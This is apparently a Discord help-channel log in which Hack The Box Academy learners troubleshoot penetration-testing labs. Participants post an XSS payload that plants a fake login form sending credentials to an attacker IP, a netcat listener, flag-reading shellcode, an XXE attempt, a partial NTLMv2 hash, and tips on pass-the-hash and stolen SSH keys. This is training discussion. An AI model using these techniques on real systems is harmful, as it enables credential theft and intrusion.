#modules

are you rdp to win01?

just use the Run command or Windows search

also idk if that's proper arg syntax for remote desktop

@fathom pendant no i have a shell open where i can use powerview or what not instead of that webshell one..i am trying to get into ms01 for q4

why not try and set up a proxy then

i tried to upload chisel - but it gives me an error

i guess i can retry

there's more than one way to proxy

i'll look into the others

also how are you expecting to get a gui application through a shell in the first place

was going to try netsh, but no go...anyway looking for a way to get into ms01 still

Hey hackers, I'm very excited to take baby steps in hacking with HTB academy! I would appreciate your help in getting started with priv escalation module. I have become user2 and now i wanna be root . So i go in /root/.ssh . I cat id_rsa , copy the contents..create a new file in my pwnbox and paste the contents of it . Then i do ssh root@IP -p PORT -i id_rsa After pressing enter the shell just hangs there ..I'm not able to see ssh output. What am I missing here ?

Note: I'm sshing while being user2

The user you are sshing into as, in this case root, needs the public key inside of ~/.ssh/authorized_keys

Well, whatever is configured inside of /etc/ssh/sshd_config under the AuthorizedKeysFile section.

@prisma spruce Hi, thank you for the response. I'll check it out ⭐

don’t need a new id_rsa

you also need to make sure that the id_rsa is chmod to 600

chmod 600 id_rsa

I have never quite understood the point of that restriction.

they need it to be able to ssh from the pwnbox to the target

it's read/write restriction to just the owner of the file

Yes, I know. I just never understood the point of the restriction.

Instead of letting you ssh in anyway, they force you to first change the permissions on the file before you can ssh in.

he’s authenticated already as user2

yes and the goal is root at the end, no?

read carefully where he copied the rsa key from

If id_rsa is inside your .ssh directory, you won't need to include -i id_rsa

stop pushing him away from doing it this way; this is from the getting started module iirc; where they have you do it in a way that's easy for beginners

@surreal nymph are you trying to ssh from the pwnbox/attack vm? if you're doing it from the target system where you're user2 it will cause issues

you need to make sure the terminal shows your username; not the user2 username

Does the module tell them how to add things to their keyring or their config file? If not telling them that they can but don't need to do that doesn't seem wrong.

it does not

the module tells you about copying id_rsa

you're adding unneccessary complexity to someone that's starting out

while yes that is something they can do it defeats the purpose of learning if you're having them do extra unneeded steps

they have the root rsa key; no need to do anything extra

I dunno. Not having to type out -i id_rsa seems like fewer steps to me.

it's more steps to add it to the keyring my guy

whereas it's simpler to keep the idea of the rsa file as it's own standalone object to prevent confusion early on

You don't need to add it to your keyring for that one.

you're coming at it from a more experienced perspective

it also reinforces the idea that this file is what opens the door

@fathom pendant I logged in via ssh root while I was in my pwnbox

Why was I not able to login to ssh root when I was user2?

you can't ssh to a machine you're already using

is the short of it

Oh yes !
Right !

I missed that

Thank you everyone for chipping in with your thoughts ⭐. You are guys are root!

the long end is- networking constraints on the port; causing traffic conflicts where it's trying to talk to itself on a port that's already occupied

?

ssh protocol is dumb

:P

I'm pretty sure you can ssh in to your own box multiple times

You can right?

you're ssh to a machine and trying to ssh into itself is an issue

That should not be a problem

It would still pick a random port to go outbound with.

it's also just box constraints

:P

i know you can ssh with multiple users to the same box

at the same time

Had fun with this box

it's just these labs are notorious for having some dumb quirks

Yeah, then it's a box issue not a ssh issue.

ssh constraints just happen to be one of them

also i'm referring to ssh callback to a box you're already on -

as in being a user on the box

and using ssh to try and switch user

Yes, that should not be a problem.

i've not seen it work ¯_(ツ)_/¯

could be that inbound connections are disabled from localhost

It does work as far as I've used ssh, you could disable inbound connections from localhost but that's not the default case.

Yeah, it wouldn't make sense as a default because there should be no inbound/outbound conflicts. It's not really how ssh works.

yeah i was making some dumb assumptions since i've never seen it work in the context of the labs

Or any protocol, for that matter.

like it being dumb to use rdp on your own windows machine

https://paulbutler.org/2022/what-does-it-mean-to-listen-on-a-port/

I don't need to read the article i just had to apply critical thinking

:)

Yeah, that would be dumb lol

but i guess idk if it's not explicitly disallowed by default

like it doesn't make sense to ssh to yourself is what my initial thought was going off of

#modules message well this isn't critical thinking is it

Hackers, this is my attempt in getting my first cert in cybersecurity

CPPT

I've done that in scenario where your machine is connected to a VPN tunnel and you'd wanna do some internal routings and stuff, I don't exactly remember the problem I was fixing, but ssh came in godly.

like i said: had to apply

don't need to be a dick about it

https://www.youtube.com/watch?v=afLjeXrZuvc

i was just going off of, at the moment, i hadn't put much thought into it considering how dumb the concept is

no need to keep trying to go at me over it

:P i had a dumb moment and was corrected

it happens lol

That's the only localhost connection usage I experienced, or else I would have thought that self connecting to ssh would be the same as self rdp lol

yeah

like you can see where my thought process stopped

like "nah that's just dumb so surely it's just not allowed"

i gotta also remember "this is technology, dumb shit happens all the time"

now i know what to try instead of exfil rsa keys next time ¯_(ツ)_/¯

or if I have write access, just put my key in there

I just love ssh xD

Yup

idk why i always seem to manage to fuck up scp

it's like the most simple thing

scp source destination

yet SOMEHOW

i fuck it up

I had to mess it up a lot to get a hang of it too xD especially the -P instead of -p

I remember it as what's in left gets moved to what's in right

I can never remember the syntax for scp unless I look it up, so I almost always use sftp.

cd/lcd, put/get is much easier to remember

then i run into where it doesn't do anything even when i swear i did it right

this is why I just have an nginx server running to upload to

and download tools from

wget doesn't fail me (until it comes to windows, and i gotta remember -Outfile)

one thing taht at least helps me remember some commands is just that they sound like what they do if you say them out loud

True lol

telnet? tell the network?

Off to solve nibbles 😍

Btw , if i use metasploit always..will that make me a 'script kiddie '?

yes

I love the ease of use of msf though ❤️

KERBEROS ATTACKS skill assessment someone can give me hints

metasploit is a crutch

there's often better (and more controlled) ways to do what you want than msf

Ummmmmmm

What's the content of the file: \DC01\Secret Share\flag.txt? this one

Thank you! @fathom pendant

You are awesome

it's fine when starting out; but usually there's a PoC (proof of concept) code that you can read to understand how the msf exploit works

Thanks @fathom pendant

Yes , I saw a guy had ported that exploit in python in his repo ..

that tends to be the case with a lot of the exploits

Looked scary

considering how old they are

not much scary about it if you know what they do ¯_(ツ)_/¯

Yes ,true that

the only way to look is to actively seek the knowledge

I would love to write exploits in Ruby one day

The language just fits in my.mind

a lot of the attacks and stuff in the pentester path are done without msfconsole

⭐

⚡

does the exploit or whatever exist there? probably: but it's still good to know alternate ways

especially if you're in a position of working off a compromised machine that might not have tools installed

and running tools will get you caught by AV/EDR

Wowww
Yes

And if it's a windows machine ..and if my exploit needs to run on the victim machine. Then Ruby or python scripts will be useless

<@&861185840277487616>

🙄

I see.

one minute.

https://tenor.com/view/just-woah-gif-27301594

guy from fortnite

Hi guys, I need your help with the module Windows Forensics.
I am unable to RDP into my target 10.129.228.172. Please help me; thanks!

Why are you using ssh?

Don't we use ssh to connect with Targets?

Only if it tells you to.

It's telling you to use RDP.

Do you know, what's the right command for RDP. This is my first time, I came across RDP connection requirement to connect with the target.

Usually, it's been SSH, so far.

/xfreerdp /v:IP /u:User /p:Password

Thanks sire!

This was insight; I will keep this in my mind in future.

lol yes it helps to read the instructions

Currently following the “Information Security Foundations” Path. I just finished the introduction to Network Traffic Analysis module. But haven’t done the Introductions to Command line nor the Intro to Bash Script, should I do that before preceding to Intro to Active Directory? 🤔

My goal is CPTS and Bug Bounty Path

That depends on your knowledge. If you know the basics, you don't need these modules. But I'm sure that even if you have knowledge, you'll still learn a thing or two in these modules

I don't recall seeing anything in the intro to active directory module that required knowledge from those two modules, and especially not introduction to bash scripting.

HTTPS & TLS Attacks: problems with running TLS-Breaker tool. After installing with JDK-22 and JDK-17 a lot of errors when running Bleichenbacher, Heartbleed etc. What version Java can I use without errors etc????

I see. My doubt is actually just the order. I intend to do it all, the problem is I don’t have cubes for the Windows command line Module nor the Bash module. I was intend to finish the “free” stuff before applying to the Silver Annual subscription

It's best not to do them before you get the silver annual subscription.

Oh! Then I guess I’ll buy it now

Are you a student?

No

Yes, you can do it that way.
You won't need Bash for AD. The command line rather, but the required commands will certainly be shown.

Don’t have a student email, nor I am from America

Oh. I did the math for it a few days ago. It isn't really worth it, but if you do get it you're better off not doing the tier 0 modules first because you get cubes back for them that you otherwise wouldn't, which amounts to ~$15.

#modules message

Does anybody know if the subscription is activated immediately upon applying to it?

Yes, the subscription is active immediately

Thank you!

And thank you for the help 🙂

Hi guys can u pls help me? I got stuck at Broken Authentication Assessment, I found the admin/support users with the country code and found that the cookie is made of the username formatted to md5 and base64 but can’t put those together. Keep getting user admin.us can’t have requested role (or something)
Any help would be much appreciated

hello i need help with Windows event logs Skill Assesment

I just completed the Footprinting module. IT was a challenging read due to some grammatical errors, most of the stuff kinda just flew past through me. I thought it was great although it could've used more commands in the IMAP/POP3 section for fetching emails. Managed to do the hard challenge all on my own without help, was fun little gag to hide that database almost missed it.

@fathom pendant my apologies, i dm'd you without asking

What exactly do you need help with?

the 3rd question which is By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe

ihv filtered 7 i ctrl f every kind of think imaginable and still nothing btw i did use find even without filter by 7

Take another look at how you can recognize a process injection with Powershell.

I did try the create remote smth smth I found from google

You don't need to google it. Look again in the module to see what exactly happens during a process injection with PowerShell. Then you will also know what to look for

It's to do will event viewer right?

CLR.dll is what I look for

Not only

I'm not gonna type BCS it's not permitted but I found the exe that used to run it

I can't use process hacker here tho

You don't need process hacker

Those are the tools used at process injection

You can see everything in the Event Viewer

Event id 7?

Look in the module

That's what's written there

Can u send ss?

There is no MacOS Machine

buy one

you can do the module without having access to macs, I did it just need some googling

That's some big balz. Lol. Gg

I think I someone mentioned it before and they used an ID not mentioned in the course for remote threads that also work.

But payloadbunny's advice stands, trying to analyze how they detected remote injection then trying to replicate it

Yes, you can find the answers, but you can't do the exercise

I remember some years ago some weird way to get a macos VM, I never tried it but it was an annoying process. Have no clue how it's at now

I don't know, since I have a Mac, I didn't really care

I have 4 "windows" 0 macs lol

Actually 2 windows and 2 proxmox/windows

There is no machine in this module.

You must perform the exercises with your own Mac

In Cross-Site Scripting, Phishing Section
I need to use this javascript to remove the input bar as well as add a phishing login form

document.write('<h3>Please login to continue</h3><form action=http://our_ip%3E/<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

Problem is browser is not letting me use semicolon ; in this so second query which is document.getElementById('urlform').remove(); fails to execute.
I tried Firefox and Chromium.
I need a way to run both queries together.

I did that tho idk what else is left to do ihv been on this for hours now

What's the section name?

I don't remember that section exactly but if you're sending the payload through a url you might want to url encode it

Analyzing evil with sysmon

Oh don't tell me it's etw

I don't have my notes for this organized. Give me a few

Sure

You only need the Event Viewer.
Take another look at question two. The questions are related.

If youre directly injecting this into the field thats most probably why its failing
This is supposed to be inbetween script tags, thats how the semi colon gets interpreted as inline js.

I know the answer for question 2 is what I use for 3 bit can't find any other exe that's mentioned

I wrote every exe I saw and all came wrong

Take a look at the ||ProcessID||

Noo f way I ignored that exe like 500 times now it's so camouflaged

I knew that pid and filtered it but never wrote it

Thanks

my rdp sessions give me black screens 80% of the time in the last few days. Anyone experiencing the same ?

it's a screensaver, just press enter

<@&861185840277487616>

https://tenor.com/view/i-have-been-summoned-gif-19881033

you were asleep last night when we needed you most 😢

Not asleep. Just AFK without my phone in hand. I saw the aftermath though.

no dumbass; read #rules

they posted a token supposedely theirs a minute ago mto

it's as dumb as it sounds

Thank you for letting me know.

claiming it was theirs

but yk

¯_(ツ)_/¯

https://tenor.com/view/ban-hammer-gif-18149775

Just finished the HTB getting started knowledge check. GLad to get it done that one was very frustrating. it seemed that I kept having to regenerate a new IP as the system would either lock me out or in a few cases extremely slow

in the attacking common services module, SQL last exercise, I need to connnect to the DB using the cracked password, which I got. But I keep getting
ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
my command:
impacket-mssqlclient msqlsvc:[password]@10.129.228.184 -windows-auth

I searched through this channel's history and it seems to be what others also did and it worked for them. So I don't know ...

try changing vpn region

If you all have any suggestions. I am running my kali on virtual box. It seems to be the only VM that I trust now. I have a VMware liscence but I prefere VB

this should work, reset the machine and try again

already did

can't seem to be able to

using the pwnbox?

no I am using the VPN

I could try the pwnbox

then you should be able to change vpn region through the menu

then download a new connection; terminate the existing one

¯_(ツ)_/¯

is that a vpn region issue?

¯_(ツ)_/¯

maybe? sometimes things are buggy

also do terminate then restart the machine if you haven't tried that already

Hello i m doing the Security Session and i have some trouble to do the last one i did a xss in the profile julie and try to steal the cookie with this url http://minilab.htb.net/submit-solution?url= http://minilab.htb.net/profile?email=julie.rogers@example.com but nothing what i am doing wrong ?

your user is misspelled if that's really your command

is it supposed to be rodgers?

it wasn't to swodax, haven't done that one

oh lmao

i can't read

none of us can, and so we hack

hey that's my line

I shamelessly stole it

Damn I think it was a misspelling ... I got with the pwnbox though

like I said

you were missing an s

yeah I saw you message. Thanks for the help guys

no problem

mssql

the extra s is important

though it would be devious to make a box like that

The error message is weird if it really was a misspell

not really, it's a generic message for wrong login details

I got a few different ones over the course of that chapter.

but eh, live and learn

yeah, depends on what you're trying to do, what flags you're using, which part was wrong, good to note everything down

I am working on RDP and SOCKS Tunneling with SocksOverRDP and I am right at the end to get the last flag but I keep getting disconnected for different reasons. I have restarted the box several times and I have selected modem option under experience but I keep getting this. I just need what is in this file and I cant click it before it times out:

that's definitely odd

try giving the lab a few minutes after restarting it

Its been like 10 min

Lol wrong reply

I tried URL encoding with just semicolon and then with whole query, it didn't work out. I'll keep trying. Thanks.

I'm using <script> tags

Wow dynamic port forwarding is so awesome, thinking all day about it, first time using it since yesterday 😃

wait till you find out about ligolo-ng

it'll blow your mind

unfortunately not in the module though

checked my notes, definitely requires URL encoding

I'm on the Module: CROSS-SITE SCRIPTING (XSS) Section: Phishing

I'm not on the questions yet, just going through the content. I'm at Credential Stealing. So in the example it say:
"So, let us start a simple netcat server and see what kind of request we get when someone attempts to log in through the form. To do so, we can start listening on port 80 in our Pwnbox, as follows:"

sudo nc -lvnp 80

But on the Pwnbox port 80 is obviously already in use.
So I changed it to port 81.

But that's not going to work for the content of the page right? => "Now, let's attempt to login with the credentials test:test, and check the netcat output we get (don't forget to replace OUR_IP in the XSS payload with your actual IP):"

I can enter the payload from above, working fine.
document.write('<h3>Please login to continue</h3><form action=http://IPHERE><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form> <!--');document.getElementById('urlform').remove();

But upon entering test:test it's not going to do much right?
So how can I get it to capture the request (without using further content below of the module) , or will that just never work like the example in the module itself?

Because then the module's description should be changed since the example would never work?

Can I DM to figure it out with you?

sure

since you're changing off default just add :PORT after IPHERE

so http://IPHERE:PORT

I think I tried that but nothing came up on netcat. Lemme try again

But it's kind of weird that the content suggest to use port 80 when it's already in use

because in most instances people aren't using pwnbox

they're using their own vm and likely not having an http server or something running on 80

you can try having it listen on 8080

yea but it specificly says PWNBOX

"can start listening on port 80 in our Pwnbox, as follows:"

huh; odd

suggest the fix in erratum

if you verify your main labs account with the discord you can post screenshots btw

the instructions are in #welcome

You can always adjust the ports

As long as you understand the concepts, nothing stops you from experimenting

will do! thx!

yea true but it was new for me 😛

I have restarted the box. I have logged in via rdp and accepted the cert. I keep getting this now:

80 was used as an example for convenience sake tbh

so the example doesn't need to specify port

so I tried adding the :81 again but nothing pops up on netcat 😭
I'll continue to debug it

You need to make it to pop up

I'm not on the actual questions yet, I'm just going through the content of the page, and there is no pop up talk 😮

what he's saying is that you need to make it work

not just expect it to magically do something :P

Anybody there to contact me regarding „Attacking Common Applications / Exploiting Web Vulns in Thick Client Applications“?

I'm still confused about what he meant and if he understood me xD
I'm just following the tutorial/guides first? of just listening with netcat

Why don't you just ask your question, what are you stuck on and what have you tried, then someone can help

just follow the module

make the slight adjustments based on the restriction that 80 is occupied

Aight 😛

Read the section first, then experiment

You will understand the flow

I am stuck while downloading the fatty-server.jar file. Pretty sure I made mistakes while editing the open function. But tbh I feel like this module completely overkills the smooth pentester path. Nothing taught in this path will get you there on your own. And I am pretty sure not many guys will do further than just copy and paste this one. I can’t take something valuable from this without more background or experience in this topic. But maybe I am alone with my opinion…

no, that's an extremely popular opinion

it's not on the exam fwiw that's why doing the writeup most would consider fine

the thick clients was an EXTREMELY late addition to the module

these sections have no place in the path, but the writeup or ippsec video for Fatty is how most people get through it

like some people were 99% of the way through the course or already 100% before adding it

it's literally based around an insane box for a path that's medium at most

Yeah I understand what to do next so that’s fine for me. But I don’t get it done right now. I wanna do the CPTS after Christmas and am a bit stressed bc of time constraints. Then you hit something like this one … 😄

like i said: this isn't gonna be on the exam

Morning lads,
I am doing footprinitng lab-hard but having some doubts whether I am on the right path. I enumerated the services and am trying some dictionary attacks for pop3 and imap using hydra but it is taking forever. Is this the correct vector? I'd appreciate a small nudge.

I haven't scanned any udp ports. I am on it. Thanks!

? I thought snmp use udp ports

for the hint of where to start: read the mission brief carefully

that'll tell you what to look for

do you mean the very first test on the page explaining the scenario?

yes

usually reading the scenario should give you an idea of what you're looking for

hello, in the pivoting module it states "Our Meterpreter session should list that our incoming connection is from a local host itself (127.0.0.1) since we are receiving the connection over the local SSH socket, which created an outbound connection to the Ubuntu server. Issuing the netstat command can show us that the incoming connection is from the SSH service.". Could someone explain me why the connection is received from the localhost? It seems hard for me understand why this is happening. I assume this is something to do with how ssh socket works, but i dont really have a clue about it

ssh receives the connection, then pass the connection to meterpreter on your localhost

Hi. I'm losing my mind. I am going to try and ask this with as little spoilers as possible. On the Skill Assesment, task 2, for Intro to Assembly, should I be on the lookout for a spelling error by any chance lol

IF someone would like to DM me to discuss further or possibly give me a little nudge that would be excellent. Im runnin out of ideas lol

No, the file is named like that on purpose so it fits within 8byte with 0-termination

What are you struggling with? Can’t get the payload small enough?

See I thought the file was on purpose, and I feel like my code is small enough but I am still getting hit with Failed to run Shellcode everytime

I dont want to post any spoilers, would it be ok if I sent you a dm?

Sure

Hi guys, can you help me with something?, I just finished AD Enumeration & Attacks - Skills Assessment Part 1 but I want to clarify something. I am inside a windows host I can scan a network with a loop in powershell, let's say I find 4 alive IPs, is there a way to know the name of the computer of each IP?, for example, IP 1 is DC01, IP 2 is MS01, etc.

can make a smb connection to get the host name

basically what crackmapexec/netexec do when you do a smb scan

nslookup, nmap, smb like above (you can use cme)

Hey, I'm stuck in the attacking common services module in the lab of attcking databases. I found the password of mssqlsvc but I can't connect with it to the db or switch to its user or execute command with its permissions. Any hints?

If youre on a victim I think you can try checking the routes/arp/dns cache too but idr specific commands for those

Attacking SQL Databases yeah? did you try connecting with mssqlclient?

Ok, ty. I will take a look at that.

Yeah, tried with -windows-auth but I get an error of untrusted domain, and without it the password just fails for some reason

make sure you're using both 's'

mssqlsvc not msqlsvc

I run: ||python3 mssqlclient.py mssqlsvc:$PASS@$IP||

use -windows-auth

and you should remove the password since that's the answer to the previous question

^

Changed it and thanks! It errored before about untrusted domain and now it doesn't for some reason

you probably misspelled the user

ngl it's the most common and easy thing to do with this

like one of the modules you have htbdbuser or something along those lines LMAO

https://www.youtube.com/watch?v=QtmXHu6GWck demonic c2 still insane l4-l7

probably lol

what module does this relate to

One more question, ||I had to crack the mssqlsvc hash using the password list and rule from the password attacks module, and the actual password didn't appear in the Attacking Common Services module resources->pws.list. Does the password list from the password attack module relevant for all the other module?||

its so common and easy to make that even though Ive seen it dozens of times I still occasionally miss it at first glance when someone posts their term output wondering whats not working

i believe it's in rockyou

It is, but why do they provide pws.list for the module and then don't include the necessary passwords in it?

gotta think outside the box sometimes

also i think the example shows using rockyou for cracking

They don't show a cracking example in this section, but in the smb one they do use rockyou

order of ops for the password attack module in list usage:

Discovered lists within the lab -> mut pass list -> reg pass list -> rockyou

this is from a separate module

from pw attacks

ah then 99% of the time just rockyou

^

Okay thanks!!

rockyou is just the general ctf agreed upon list that if you require bruting in your challenge the answer needs to be in rockyou

they really don't stray too far from rockyou (because that would defeat the actual purpose of what it's teaching you)

can some give me hint what for a remote tool i need for question 3 in skill assesment 2 active directory tryd litlerly all i know

What was question 3?

so i recently was planning to get into developing windows GUI apps .... do i need to be a software engineer to develop gui modern looking apps or i can use c++ to do ... i did learned some good fundementals in c++ and i wanna get into developing the gui apps ... anybody can give me resources for that i could develop my skills on plz and thank you

i need it for my capstone project ... i am planning to make a C2 framework and i just have 6 mounths

Sunniten the Flag on ms01 Form C:\flag.txt but any Tool i Know dont work

giving the module name would be useful

use visual studio tbh

it's a decent IDE for C/C++ and allows you to better visualize it

bing chat is pretty damn good!

AD skills assessment 2

Jap

oh right I'm blind

i mean it looks like it pulled it straight from htb forum

thats also literally what the module tells you to do

the hint should help there, try different protocols to access ms01

youd have gotten the same information from just doing the module

i'm still impressed by bing chat this is so cool

If did not , I don’t write here lost over 2 hours as au said I tried all I know

https://tenor.com/view/the-simpsons-why-didnt-i-think-of-that-hank-scorpio-homer-simpson-you-only-move-twice-gif-20385109

it's not impressive that it's telling you just the basics of a file upload attack

like this saves so much time and it's amazing to say the least... it's good for people like me who have severe adhd 😄

What have you tried?

do you have notes on it? cause I don't remember lol

someone told me that I can do some things with C++ like have a backend in C++ and a web frontend in electron and make them talk to each other in any of the IPC methods, and package them in a single exe.
also just putting this out there you can do the whole electron stuff while still keeping your frontend cpp, if you wanna do the whole stack in C++ since wasm exists now

i mean the module also gives you example payloads

i really don't see what the huge boost is

this is literally just what the module tells you to do though???

evil-winrm, psexec, wmiexec, cme

I have the whole chain in my notes yeah, just haven't added the questions in order to immediately be able to say what the way is based on the question itdelf

ah okay you can take over then 🙏

I mean that's just randomly throwing tools at it, have you tried every protocol with cme and do you have valid credentials

Ahhh that you mean no only smb

Nice hint tanks

That helped

No problem

Looks like you were correct even without notes

Did anyone experience any issue installing crackmapexec on Parrot? There seems to be a few python packages missing from the repo

I also tried pip install but no luck

instead install netexec

Crackmap is no longer being maintained, and a lot of the devs moved to netexec

it has the same features

is it on the package manager? I can't seem to find it.

https://www.netexec.wiki/getting-started/installation/installation-on-unix

thanks!

hey. this doesnt have to do anything with the modules but i need some help

i wanna install parrot os in my bios like i have to chose if i want to run windows or parrot os. does anyone have any suggetions on what to do?

Follow the instructions on the parrot website

Has anyone gone through ADVANCED XSS AND CSRF EXPLOITATION, More specifically the section Bypassing CSRF Tokens via CORS Misconfigurations? Having trouble with question at the end, for some reason everything I try to test out my payload I get invalid CSRF token I've made sure I am extracting it from the right HTML element as well. Was wondering if anyone can provide any pointers?

EDIT: figured this out

https://parrotsec.org/docs/installation/dualboot-with-windows

I am doing the Hard Firewall and IDS/IPS Bypass Lab for the nmap module and can't seem to find the flag. I've found the service they moved and scanned it while looking at packets with packet-trace but I'm not seeing anything. I've also tried netcat and telnet for banners. Am I looking in the right place?

Nevermind, lol

I am doing the common service attack DNS chapter and for the exercise you are asked to find all sub domains and the flag should be amonsgt them so I run a brute force attack against the server with subbrute and I only 3. None of them contain anything interesting. I ran this for like 30 minutes. Am I doing something wrong? I used the small wordlist included with it.

your resolver.txt should have the target ip in it: after you find the subdomains from the tool you should dig txt [subdomain].inlanefreight.htb @ip

or dig axfr [subdomain].inlanefreight.htb @ip

man I don't get DNS ... if I do an A, TXT or whatever I get nothing and something SOA. I just did a axfr and it's showing me txt and a entry all of a sudden

thanks

yeah i think you have to include like type=txt in dig

in my experience DNS queries are always a hit and miss. Tools don't all react the same too it seems

yeah

dns is dumb

It's always dns

Can someone help me with ```
Try to exploit the upload form to read the flag found at the root directory "/".

I am trying with something like that but without upload folder its useless

I'm working on the documentation and reporting practice lab.

I want to get the flag on the Administrator desktop of DC01

I have found and cracked a bunch of password hashes. Several of those credentials allow me to log on to DC01, but I don't have permission to read files on the Administrator Desktop.

I've tried using the Python version of Bloodhound to figure out which users have admin access over DC01. I've also dumped ntds.dit using CME and gotten a ton of hashes. I haven't found any that are crackable.

In the given notes, I see a hash that was retrieved by using Responder, but hashcat can't crack it. I cracked three other hashes I got using Responder, but none of those accounts allow me to read files on the Administrator desktop

I don't think anyone can quite tell what you are trying to do. You seem to be posting and image which contains some tags about /etc/passwd?

Yes i am trying to see if xxe vuln is working

he's trying to get an xxe payload to get the /etc/passwd file from the host system that's running the web server

the image tag is merely to bypass upload filter restrictions

But its going inside img tag and not working

And i am stuck on this

is your XXE supposed to return anything?

Yes

you dont need to crack ntds.dit hashes

just pth to log in as domain Administrator

What is it returning? All I can see is a string of something. An image of some sort?

Its returning what i have to it

what you have? You mean what you have sent?

Becauee its just giving file content of this .svg into IMG tag

I have some trouble with the WordPress skill Assessment. I am stuck in the question three: submit the contents of the flags file in the directory with directory listing enable I don't understand how to approach this prompt. I already find some directories with owasp, I reviewed each one and did not find the flag.

This payload with xxe

I added the target ip to etc/hosts/ but I can't get this question.

But its returning IMG tag with src as this payload content

Not the value payload should return

Any help will be very appreacite it!

so it's essentially just sending back what you have sent?

Yes

Its not executing what it should

then maybe it's not about reading a file

?
W

Wym

he's trying to read the file as PoC that his coding is working

Maybe it's executing your command, but maybe it's also not sending back the output

How it couls execute it

I dunno, you said it should

If to execute it you need to make it render

I need to get upload dir

yeah, but the output might not be where you expect it

tbh it doesn't sound like you entirely understand what he's trying to do

I am not, I am just going off what's he's saying.

then you're not really "helping" if you don't know how to actually fix/push the code in the right direction tbh

can you double check that you've followed the section as it's described?

no one is helping him, so I just go off what I know. He very well could be doing the wrong thing. It's just general troubleshooting

Wym

Like i dont understand how to make this xxe payload work

And that's why i ask for help

this is from one of the sections in the file uploads module yeah? reread the section, make sure you didn't miss a step

Yeah

I checked it

But i know

That it couldnt be run inside img

yes it can

^

depending on the situation

the module specifically covers doing so with svgs for instance

Ok but will it also work with PNG signature

I am just wondering isn't that an issue

that I don't recall off the top of my head

Thank you very much! Got the flag.

np

dont forget the simple answers haha

But can someone give me a hint

I just cannot figure that out

cmon 00:01

Intro to assembly language skill assessment task 2 getting "failed to run shellcode using : global _start
section .text
_start:
; push './flg.txt\x00'
xor sil,sil
push si
mov di, 'xt'
push di ; push NULL string terminator
mov rdi, './flg.txt'
push rdi

; open('rsp', 'O_RDONLY')
mov al, 2 ; open syscall number
mov rdi, rsp ; move pointer to filename
syscall
; read file
lea rsi, [rdi] ; pointer to opened file
mov rdi, rax ; set fd to rax from open syscall
xor al, al ; read syscall number
mov dl, 24 ; size to read
syscall
; write output
mov al, 1 ; write syscall
mov dil, 1 ; set fd to stdout
mov dl, 24 ; size to read
syscall

which produces 4030f6665666bf7874665748bf2e2f666c672e747857b0024889e70f05488d374889c730c0b2180f05b00140b701b2180f05

not sure were I am going wrong

God people need to learn formatting

Im just a normal person not a God person.

I'm not helping you now out of principle of you being a smartass

https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-

Btw it's more readable if you wrap code statements in ``` before and after

Though since your account is unverified, automod likely will yeet it

Can someone take a look into my help post regarding wordpress skill assignment?

Also can someone help me with file upload skill assesment

@thorn urchin pls i think you can help me with these or atleast give me hint

Hello everyone. Its becoming really frustrating to work with hashcat. I get exhausted every time.

I am trying to crack a ntlmv2-SSP hash, I have recovered a ocuple of hashes from responder but when I try to crack them I get exhausted. Im not sure if there is a formating error in my hashes or not

but its very annoying

find directories with with listing enabled and look through them

if the format is wrong, hashcat will tell you, if you can't crack it with rockyou then it's not supposed to be cracked

yes that what I thought. But the question is literally asking me to crack one of the hashes I found

module and section?

you can send the first part of the hash

LLMNR from Linux, wley::INLANEFREIGHT:cd4d239f7b9778a3:324060F4B57AD6429A212E016F0AC2BE:010100000000000080

first part of the hash this is.. the hash is quite long

Sadly I am incapable of providing advice if I do not know where you're stuck and what youve done or tried.

One day Ill achieve psychic resonance and read minds but I'm not there yet

forgive me for my ineptitude

ah should I use the /usr/share/responder/logs/ file as source directly into hashcat?

Not necessary

sometimes hashes are long

it seems to go on longer that way.. when I try it differently it gives me an exhausted messages rather quickly

Hashcat should crack it if you use the ntlmv2 mode

I am using 5600 which is the correct mode

are you using rockyou?

yessir

which module

Feel like I'm missing something obvious but for the Footprinting lab, but I connect to the FTP server and when enter "ls" it's not loading the file list

llmnr from linux

Any help?

llmnr from linux isnt a module

ls -la

which module are you doing

should be AD

aight this is driving me wild. Its late, Im going to bed and will try again tomorrow

good night everybody

Hey Marcie, again another dumb question, when I do that command for some reason it's not showing the name of the directories or files

Skill assessment yeah? Make sure you're on the right port

Can you specify the port with the "ftp <IP>" command? Netcat times out whenever I try to connect and telnet is not recognizing any of the commands I put in

Yes it's just putting the port after ftp user@ip port

make sure the password is in one single line

I think that is my issue I don’t fucking know what is listing enabled

Thanks MarcieLee.

For what?

Lmao I don't recall interacting with you

The information you are giving is helpful and useful.

¯_(ツ)_/¯

literally just google wordpress directory listing enabled and look at the images, that's what you should be looking for

got it, will do. THanks!

@fathom pendant need help once again, I got into the proxy ftp server, but I cannot for the life of me find the flag.txt file. Looked in all the directories I found and cannot find it at all

Because that might be the start: not the end

Hint: ls -la reveals an important directory

I've been dooing ls -la to see the file list, and the 2 directories I have gone into didn't have the file

Sorry I'm just having a hard time on this and can't find anything from searching ftp commands

Easy lab, yeah?

Yes, I'm frusturated because I had no problem with the FTP before but I cannot figure this out at all

ftp ip 2121
username
password
ls -la

It worked for me

If you did username@ip I apologize that was my bad I forgot ftp is dumb that way

I've been doing exactly that. No file there and then I go into the 2 directories .cache and .ssh and neither one of those has the file either

Think carefully about what you just said

ls

Like I said ftp isn't the end, it's a step

Do me a favor, just try and ssh into the target and see what that tells you about this info

You figure it out? @swift forge

So I downloaded the 3 files from the ssh directory, but when I try to ssh in with the keys I'm getting an "Warning: Unprotected Private Key File" message and it denies me

Remember, key files need special perms, also you only need one of those files

So I believe it is the one with the private key, but I'm not sure how to protect it to use it

chmod NNN file

Remember what the permissions in linux are

it's december, not NNN anymore

Module: Pivoting, Tunneling and Port Forwarding
Section: Port Forwarding with Windows Netsh

i rdp`d into the Windows pivot host
i established the port forward

now i try to connect from my attack box through the pivot to the victim, but my connection gets refused.

xfreerdp /v:ip:8080 /u:victor /p:pass@123

i dont know where the fault is

You want it so only the owner can read/write the filr

So it should just be execute permission correct?

Should've waited 1 sec lol

Why do you need to execute a key file?

Instead of adding the port to the ip add it with /port:
